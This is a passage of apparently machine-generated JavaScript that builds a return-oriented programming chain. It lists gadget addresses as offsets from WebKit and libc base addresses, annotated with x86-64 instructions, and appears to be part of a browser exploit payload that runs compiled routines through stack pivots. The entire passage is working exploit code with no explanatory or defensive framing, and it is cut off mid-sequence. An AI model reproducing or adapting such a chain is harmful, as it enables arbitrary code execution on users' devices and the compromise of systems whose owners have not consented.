set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+172320, //L2624
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+172288, //L2622
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+172304, //L2623
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2621:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2622:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2623:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2624:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+172376, //L2626
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2626:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+172504, //L2628
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+172520, //L2629
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+172488, //L2627
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2627:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2628:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2629:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+172632, //L2631
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+172680, //L2634
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+172648, //L2632
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L2631:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2632:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2633:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2634:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+172792, //L2635+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+172784, //L2635
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2635:
db([0, 0]); // 0x0
set_gadgets([
ropchain+172808, //L2635+24
ropchain+175056, //L2630
libc_base+764760, //pop rsi
ropchain+172848, //L2636
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2636:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2638:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+172968, //L2641
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+172952, //L2639
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2639:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2641:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+173080, //L2642
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+173128, //L2645
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+173096, //L2643
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2642:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2643:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2644:
db([8, 0]); // 0x8
set_gadget(libc_base+759608,); //pop rax
//L2645:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+173232, //L2648
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+173216, //L2646
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2646:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2648:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+173376, //L2651
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+173344, //L2649
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+173360, //L2650
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2649:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2650:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2651:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+173456, //L2652
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2652:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2654:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+173576, //L2657
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+173560, //L2655
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2655:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2657:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+173736, //L2661
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+173704, //L2659
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+173720, //L2660
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2658:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2659:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2660:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2661:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+173792, //L2663
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2663:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+173920, //L2665
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+173936, //L2666
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+173904, //L2664
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2664:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2665:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2666:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+174096, //L2670
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+174064, //L2668
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+174080, //L2669
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2667:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2668:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2669:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2670:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+174152, //L2672
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2672:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+174280, //L2674
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+174296, //L2675
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+174264, //L2673
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2673:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2674:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2675:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+174376, //L2676
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+174392, //L2677
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2676:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2677:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+174488, //L2679
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+174472, //L2678
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2678:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2679:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+174568, //L2680
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2680:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2682:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+174688, //L2685
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+174672, //L2683
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2683:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2685:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+174768, //L2686
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+174784, //L2687
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2686:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2687:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+174864, //L2689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+174896, //L2691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2689:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L2690:
ropchain+175024, //L2688
libc_base+144605 //pop rdi
]);
//L2691:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+175000, //L2693
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+175016, //L2692
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2693:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2692:
db([0, 0]); // 0x0
//L2688:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L2630:
libc_base+764760, //pop rsi
ropchain+175136, //L2695
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+175120, //L2694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2694:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2695:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+175240, //L2696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+175256, //L2697
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L2696:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2697:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+175376, //L2698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+175360, //L2699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L2699:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L2698:
db([0, 0]); // 0x0
//__strnlen_s:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+175448, //L2701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2701:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+175512, //L2703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L2703:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+175584, //L2704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2704:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2706:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+175704, //L2709
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+175688, //L2707
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2707:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2709:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+175792, //L2710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+175808, //L2712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2710:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2712:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2713:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+175888, //L2715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2715:
db([0, 0]); // 0x0
//L2714:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+175936, //L2717
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2717:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2719:
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+176056, //L2722
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+176040, //L2720
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2720:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2722:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+176136, //L2723
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+176152, //L2724
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2723:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2724:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+176312, //L2728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+176280, //L2726
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+176296, //L2727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2725:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2726:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2727:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2728:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+176368, //L2730
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2730:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+176496, //L2732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+176512, //L2733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+176480, //L2731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2731:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2732:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2733:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+176672, //L2737
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+176640, //L2735
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+176656, //L2736
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2734:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2735:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2736:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2737:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+176728, //L2739
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2739:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+176856, //L2741
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+176872, //L2742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+176840, //L2740
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2740:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2741:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2742:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+177032, //L2746
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+177000, //L2744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+177016, //L2745
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2743:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L2744:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2745:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2746:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+177088, //L2748
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L2748:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+177216, //L2750
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+177232, //L2751
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+177200, //L2749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2749:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2750:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2751:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+177392, //L2756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+177408, //L2757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+177344, //L2753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L2753:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2754:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L2755:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L2756:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2757:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+177520, //L2758+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+177512, //L2758
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L2758:
db([0, 0]); // 0x0
set_gadgets([
ropchain+177536, //L2758+24
ropchain+178280, //L2752
libc_base+764760, //pop rsi
ropchain+177576, //L2759
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2759:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2761:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+177696, //L2764
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+177680, //L2762
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2762:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2764:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+177840, //L2767
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+177808, //L2765
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+177824, //L2766
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2765:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L2766:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L2767:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+177928, //L2769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L2768:
db([4294967295, 4294967295]); // -0x1
set_gadget(libc_base+759608,); //pop rax
//L2769:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+177984, //L2770
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L2770:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L2772:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+178064, //L2774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L2774:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+178168, //L2775
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+178200, //L2777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L2775:
db([0, 0]); // 0x0
